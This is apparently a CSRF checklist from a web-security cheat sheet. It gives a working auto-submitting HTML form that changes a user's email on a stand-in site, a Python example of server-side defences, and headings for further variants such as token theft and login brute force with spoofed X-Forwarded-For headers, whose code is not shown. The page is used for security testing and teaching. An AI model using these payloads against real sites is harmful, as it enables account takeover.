CSRF

CSRF Checklist

Form GET request

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form method="GET" action="https://victim.net/email/change-email">
      <input type="hidden" name="email" value="some@email.com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
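The PoC above works because the target accepts a state change over a plain GET, with no check on where the request came from and no token that only the legitimate page could know. The server-side check below is an added example (not from this page or from Burp Suite) showing the three controls that make every variant on this checklist fail: refusing state changes on safe methods, verifying the Origin (or Referer) header against the site's own origin, and comparing a session-bound synchronizer token in constant time. The origin `https://victim.net`, the cookie name `session`, the form field `csrf_token` and the secret key are all assumptions made up for the example.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumed server configuration (constructed for this example).
ALLOWED_ORIGIN = "https://victim.net"
SECRET_KEY = b"server-side-secret-for-this-example-only"
STATE_CHANGING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token derived from the session id with an HMAC.

    The token is bound to one session, so a token harvested from the
    attacker's own session is useless against a victim's session, and the
    server keeps no per-token state.
    """
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session; SameSite=Lax keeps the cookie off
    cross-site form posts, which is a second, independent layer of defence."""
    return f"session={session_id}; Secure; HttpOnly; Path=/; SameSite=Lax"


def origin_is_trusted(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is our own site.

    A browser submitting the PoC form from an attacker's page sends the
    attacker's Origin; a request with neither header is rejected rather than
    silently trusted.
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == ALLOWED_ORIGIN


def authorize_state_change(method: str, headers: dict, cookies: dict, form: dict):
    """Decide whether a state-changing request (e.g. change-email) may proceed.

    Returns (allowed, reason). Every branch that rejects corresponds to one of
    the PoC patterns on this checklist.
    """
    if method.upper() not in STATE_CHANGING_METHODS:
        # Safe methods must never change state: the GET PoC dies here.
        return False, "state change via safe method"
    if not origin_is_trusted(headers):
        # Cross-site form / Ajax / iframe posts carry a foreign Origin.
        return False, "origin mismatch"
    session_id = cookies.get("session")
    if not session_id:
        return False, "no session"
    expected = issue_csrf_token(session_id)
    supplied = form.get("csrf_token", "")
    # Constant-time comparison on bytes; avoids timing leaks and the TypeError
    # hmac.compare_digest raises on non-ASCII str input.
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "bad csrf token"
    return True, "ok"
```

Usage: the page that renders the change-email form calls `issue_csrf_token(session_id)` and embeds the result as a hidden `csrf_token` field; the handler calls `authorize_state_change` before touching the account. The Origin check and the token are deliberately independent so that a mistake in one (a reverse proxy stripping Origin, a token leaked through an XSS elsewhere) still leaves the other in place.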

Form POST request

Form POST request through iframe

Ajax POST request

multipart/form-data POST request

multipart/form-data POST request v2

Form POST request from within an iframe

Steal CSRF Token and send a POST request

Steal CSRF Token and send a Post request using an iframe, a form and Ajax

Steal CSRF Token and send a POST request using an iframe and a form

Steal token and send it using 2 iframes

Steal CSRF token with Ajax and send a POST with a form

CSRF with Socket.IO

CSRF Login Brute Force

The code can be used to brute-force a login form that is protected by a CSRF token (it also sets the X-Forwarded-For header on each attempt to try to bypass a possible IP blacklist):
